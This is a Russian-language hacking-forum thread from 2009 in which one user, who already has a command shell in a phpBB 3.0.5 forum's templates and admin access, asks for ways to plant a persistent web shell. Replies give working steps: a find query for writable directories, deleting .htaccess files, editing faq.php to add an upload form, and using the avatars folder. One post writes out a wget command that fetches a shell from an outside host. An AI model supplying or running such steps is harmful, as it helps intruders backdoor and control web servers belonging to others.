ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.08.2009, 22:02
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559
Репутация:
0
|
|
Помогите с phpBB 3.0.5
Кто может расписать как залить шелл на форум phpBB версии 3,0,5. директория chache и store под .httaccses
|
|
|
14.08.2009, 23:06
|
|
Участник форума
Регистрация: 01.05.2009
Сообщений: 212
Провел на форуме:
362450
Репутация:
76
|
|
Не думаю, что кто-то возьмется за это.
Это же звездец мне кажется геморрой.
|
|
|
|
14.08.2009, 23:15
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559
Репутация:
0
|
|
Шелл есть в темплейтах
system($_REQUEST[c])
просто я не знаю куда еще шелл залить.
ПС доступ к админке пока тоже есть
|
|
|
|
15.08.2009, 16:09
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
сделай такой запрос - покажет все возможные папки на запись:
&c=system('cd ../; find . -perm -2 -type d -ls');
тьфу, у тебя там уже систем, тогда так:
?c=cd%20../;%20find%20.%20-perm%20-2%20-type%20d%20-ls
Последний раз редактировалось Pashkela; 15.08.2009 в 16:16..
|
|
|
|
16.08.2009, 14:45
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559
Репутация:
0
|
|
я уже делал но эта злая собака .httaccses мешается( везде
|
|
|
|
16.08.2009, 15:23
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
т.е. во всех папках с правами на запись есть .htaccess, запрещающий выполнение php-кода?
хз, можно попробовать отредактировать файлы в корне форума, откуда уж php точно выполняется. Если прав хватит. Просто вставить форму загрузки например в faq.php посредством определенного php-кода через твой шелл в темплейте. Опять же если правов хватает
Последний раз редактировалось Pashkela; 16.08.2009 в 15:27..
|
|
|
|
16.08.2009, 16:25
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559
Репутация:
0
|
|
а можно подробней, как же отредактировать тот же faq.php через шелл? Если такое возможно то может просто через запрос удалить аксес, а дальше по средствам wget'а заливать шелл
|
|
|
|
16.08.2009, 16:28
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
ну дык и удаляй .htaccess, чо ты думаешь
unlink('/абсолютный_путь_до_папки/.htaccess'); - через php
rm /абсолютный_путь_до_папки/.htaccess - через system
опять же если хватит прав
|
|
|
|
16.08.2009, 16:50
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 9
Провел на форуме:
61559
Репутация:
0
|
|
непрактило, может еще есть способы залить в эту сраку шелл?
И проверьте правильно ли я вообще запрос wget'a кидаю
wget%20-O%20http://kicker-xxx.narod.ru/shell.txt%20/var/www/forum/cache/1.php
|
|
|
|
16.08.2009, 18:03
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
причем здесь кеш вообще? А что, папку с авами отменили? Зайди на любую тему в форуме и посмотри свойства авы любого участника - туда и лей, и никаких вгетов, для начала хоть phpinfo.php туда запиши. А то шелл не залил еще, а свой сайт с шеллом уже в логах оставил
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
